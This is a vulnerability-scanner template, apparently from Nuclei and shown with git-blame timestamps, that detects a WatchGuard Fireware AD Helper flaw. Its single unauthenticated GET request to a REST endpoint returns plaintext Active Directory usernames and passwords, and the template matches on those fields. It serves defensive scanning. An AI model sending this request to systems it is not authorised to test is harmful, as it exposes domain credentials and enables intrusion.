2021-12-09 15:35:13 +00:00
id : watchguard-credentials-disclosure
2021-12-09 07:02:48 +00:00
info :
name : WatchGuard Fireware AD Helper Component - Credentials Disclosure
author : gy741
severity : critical
2022-06-03 19:12:31 +00:00
description : WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
2021-12-09 15:35:13 +00:00
reference :
- https://www.exploit-db.com/exploits/48203
- https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-288
2022-08-27 04:41:18 +00:00
tags : watchguard,disclosure,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-12-09 07:02:48 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-09 07:02:48 +00:00
- method : GET
path :
- "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
2021-12-09 15:35:13 +00:00
matchers-condition : and
2021-12-09 07:02:48 +00:00
matchers :
- type : word
2021-12-09 15:35:13 +00:00
part : body
2021-12-09 07:02:48 +00:00
words :
2021-12-09 15:35:13 +00:00
- '"fullyQualifiedName"'
- '"logonDomain"'
- '"username"'
- '"password"'
2021-12-09 07:02:48 +00:00
condition : and
2021-12-09 15:35:13 +00:00
- type : status
status :
- 200